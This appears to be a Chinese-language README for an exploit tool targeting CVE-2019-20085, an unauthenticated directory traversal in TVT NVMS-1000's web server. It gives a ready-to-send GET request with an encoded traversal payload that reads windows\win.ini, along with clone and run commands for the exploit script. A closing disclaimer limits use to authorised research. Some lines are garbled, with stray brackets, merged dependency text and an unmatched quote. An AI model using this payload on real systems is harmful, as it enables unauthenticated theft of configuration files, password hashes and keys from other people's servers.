作者: Z3R0 CVE: CVE-2019-20085 目标: TVT NVMS-1000(补丁发布前的所有已知版本) 漏洞类型: 未认证目录遍历 日期: [请填写你的发布日期]
TVT 的 NVMS-1000 软件在其 Web 服务器组件中存在一个目录遍历漏洞。通过发送使用 /.. 序列精心构造的 GET 请求,未认证的攻击者可以访问 底层操作系统上的任意文件,包括敏感配置文件、密码哈希或系统密钥。
本工具利用了 NVMS-1000 上运行的 HTTP 服务器中易受攻击的文件路径解析漏洞。无需任何认证。远程攻击者可读取服务用户可访问的任何文件。
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests 模块(pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
本工具发布 仅用于教育和授权的安全研究。 作者 Z3R0 不对任何滥用或未授权访问负责。 在测试系统之前,请务必获得适当授权。